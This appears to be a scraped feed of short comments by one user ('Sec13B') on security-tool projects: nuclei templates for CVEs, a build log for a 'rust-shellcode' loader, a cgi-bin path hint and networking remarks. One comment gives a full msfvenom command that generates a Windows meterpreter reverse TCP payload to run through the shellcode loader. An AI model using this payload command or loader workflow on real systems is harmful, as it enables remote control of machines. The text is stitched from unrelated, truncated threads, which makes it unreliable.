Sec13B
Sec13B
http/exposed-panels/fortinet/fortios-panel.yaml
I think is impossible to make template for this cve , the base address of libc is hard coded. rdi ,cmd,asdf these offsets are in libc and you dont know...
i cannot find this CVE? in cves folder
its only when i run ./nuclei if i run ./nuclei -l test.txt -t anycve.yaml -o vuln.txt show work
thank you
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ┌──(kali㉿kali)-[~/rust-shellcode] └─$ cargo build --release ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Downloaded either v1.8.1 Downloaded libloading v0.8.0 Downloaded memoffset v0.8.0 Downloaded autocfg v1.1.0 Downloaded scopeguard v1.1.0 Downloaded num_cpus v1.15.0 Downloaded crossbeam-deque v0.8.3 Downloaded...
replace w64-exec-calc-shellcode-func.bin with msf.bin same error. i use : msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 EXITFUNC=thread -f raw -o msf.bin
you can start with this : {target} /cgi-bin/skk_set.cgi
   but the microsoft link : http://localhost:44569/................................
work if is same local network example (192.168.10.0/24) , if the subnets are different (192.168.10.0/24 and 10.10.10.0/24) , it doesnt work it is beautiful , it has new functions like...